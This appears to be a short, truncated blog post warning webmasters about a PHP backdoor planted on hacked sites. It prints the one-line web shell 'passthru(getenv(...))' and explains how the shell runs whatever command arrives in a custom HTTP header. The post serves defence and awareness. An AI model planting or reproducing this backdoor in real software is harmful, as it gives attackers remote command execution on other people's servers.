Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the look out for crud like this:
<? passthru(getenv(”HTTP_ACCEPT_jayman”)); ?>
This script can be used by sending whatever command you want in a “Accept-jayman:” HTTP header. “jayman” is just an example (a prevelant one), it could be anything. This can be placed [...]

